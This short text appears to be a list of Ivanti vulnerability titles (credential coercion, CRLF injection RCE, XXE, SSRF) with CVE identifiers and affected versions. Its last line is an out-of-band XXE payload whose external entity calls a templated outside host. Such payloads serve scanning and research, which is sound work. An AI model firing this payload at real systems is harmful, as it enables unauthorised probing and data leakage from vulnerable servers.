Ivanti Endpoint Manager - Multiple Credential Coercion Vulnerabilities
Authenticated RCE via OpenSSL CRLF Injection (CVE-2024-37404)
Ivanti Avalanche - CVE-2024-38653
Impacting versions 6.3.1, 6.4.0 (tested), 6.4.1, and 6.3.4.
Ivanti Endpoint Manager Unauthorized XXE Exploit - CVE-2024-37397
Ivanti Pulse Secure - SSRF Vulnerability
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://{{external-host}}/x"> %xxe;]><r></r>